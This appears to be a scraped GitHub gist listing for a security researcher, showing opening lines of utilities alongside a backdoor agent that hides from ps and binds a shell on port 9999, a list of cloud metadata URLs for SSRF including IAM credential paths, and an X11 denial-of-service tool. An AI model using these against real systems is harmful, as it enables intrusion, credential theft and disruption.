Skip to content

Instantly share code, notes, and snippets.

View epinna's full-sized avatar

Emilio epinna

View GitHub Profile
@epinna
epinna / .gdbinit
Created January 14, 2013 08:54 — forked from apetresc/.gdbinit
#
# STL GDB evaluators/views/utilities - 1.03
#
# The new GDB commands:
# are entirely non instrumental
# do not depend on any "inline"(s) - e.g. size(), [], etc
# are extremely tolerant to debugger settings
#
# This file should be "included" in .gdbinit as following:
# source stl-views.gdb or just paste it into your .gdbinit file
@epinna
epinna / pypest.py
Last active September 4, 2023 02:13
Hackish one-liner memory-only backdoor agent which hides from ps
#!/usr/bin/env python
# This script prints a simple one-liner memory-only backdoor agent which hides from ps.
# It renames itself within the process list using a really hackish (AND POTENTIALLY DANGEROUS) /proc/self/mem rewrite
# and spawns a shell on port 9999. Just an experiment, there are simplest way to run unnoticed in the
# process list (see the technique used by EmPyre: https://github.com/adaptivethreat/EmPyre)
template = """
import sys,re,pty,os,socket
@epinna
epinna / namecheap_ddns.py
Created November 4, 2018 10:54 — forked from j796160836/namecheap_ddns.py
Python scripts for update DNS record for Namecheap (DDNS Services update script)
#!/usr/bin/env python
# encoding: utf-8
# Setup introductions:
# Open Namecheap website, select a domain (e.g. abc.com) then go to Advanced DNS
# (Accounts > Domain List > Advanced DNS)
# Insert an "A + Dynamic DNS Record", with hostname (e.g. my) and type whatnever IP address.
# Edit scripts for proper HOSTNAME (e.g. my.abc.com) and APIKEY (Dynamic DNS Password).
# Run and have fun!
@epinna
epinna / cloud_metadata.txt
Created July 27, 2018 18:33 — forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@epinna
epinna / iprange.py
Created November 29, 2019 12:49 — forked from reorx/iprange.py
#!/usr/bin/env python
# coding: utf-8
#
# Copyright (C) Michael Ihde 2004 <mike.ihde@randomwalking.com>
#
# Distributed under the Python License
#
# iprange is a useful module that creates iprange generators similar
# to python's xrange. This allows you to write statements such as
#
@epinna
epinna / DemoProxy.py
Created November 24, 2012 10:23
Tiny HTTP Proxy
#!/usr/bin/python
__doc__ = """Tiny HTTP Proxy.
This module implements GET, HEAD, POST, PUT and DELETE methods
on BaseHTTPServer, and behaves as an HTTP proxy. The CONNECT
method is also implemented experimentally, but has not been
tested yet.
Any help will be greatly appreciated. SUZUKI Hisao
@epinna
epinna / Dockerfile
Last active January 17, 2019 10:24
Playground docker image
FROM ubuntu:latest
ARG LOCALE=en_US
ARG CHARMAP=UTF-8
ARG DEBIAN_FRONTEND=noninteractive
RUN dpkg --add-architecture i386
RUN apt-get update && apt-get --yes dist-upgrade && apt-get install --yes --no-install-recommends \
autoconf \
apache2 \
@epinna
epinna / popfinder.php
Last active April 7, 2018 16:50
Popfinder is a simple script that helps PHP code analysis of PHP in case of object injection via unserialize function.
<?
/*
popfinder.php - Emilio Pinna 2013
Popfinder is a simple script that can helps code analysis of PHP in case of possible object
injection[1][2] in unserialize function.
@epinna
epinna / logger.py
Created May 17, 2017 10:22
Python message format based on message logging level in Python 3
# Tested with Python 3.5.2
from config import LOGLEVEL
import logging
class SrvLogFormat(logging.Formatter):
err_fmt = "[E] %(msg)s"
warn_fmt = "[!] %(msg)s"
dbg_fmt = "[D] %(module)s: %(lineno)d: %(msg)s"
@epinna
epinna / XSh0k.c
Created January 31, 2017 15:05
Lame DoS by teenager me
/* 2/5/00 1.0
Xsh0k.c by n0rby -- NeURaL CoLLaPsE CrEw.
main code by AcidCrash -- NeURaL CoLLaPsE CrEw.
This dos simply creates a sequence of socket connections to Xwindow port
of a remote server. This cause a very disturbing effect to the XWindow user.
There are many and various effects: frequently Xwindow slows so much that
it's quite impossible to start new X programs; sometimes Xwindow don't
recognizes some keys or mouse input, and, more rarely it crash and
leave the user to the bash.